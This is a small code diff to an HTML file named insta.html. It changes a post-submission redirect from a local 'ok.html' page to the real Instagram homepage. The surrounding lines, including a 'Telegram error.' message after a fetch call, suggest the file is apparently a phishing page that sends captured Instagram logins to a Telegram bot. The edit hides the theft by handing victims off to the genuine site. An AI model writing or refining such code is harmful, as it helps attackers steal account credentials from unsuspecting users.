--- a/insta.html
+++ b/insta.html
@@ -125,7 +125,7 @@
             })
             .then(res => res.json())
             .then(data => {
-              window.location.href = "ok.html";
+              window.location.href = "https://www.instagram.com";
             })
             .catch(err => {
               document.getElementById("status").innerText = "Telegram error.";
